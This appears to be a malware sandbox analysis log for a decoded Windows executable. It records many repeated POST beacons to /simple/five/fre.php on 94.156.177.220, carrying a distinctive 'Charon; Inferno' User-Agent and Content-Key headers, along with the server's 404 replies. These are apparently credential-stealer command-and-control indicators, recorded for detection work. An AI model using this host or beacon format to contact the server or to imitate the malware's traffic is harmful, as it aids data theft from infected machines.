Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.177.220

Source: C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe

Code function: 0_2_00404ED4 recv,

0_2_00404ED4

Source: unknown

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 08:20:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
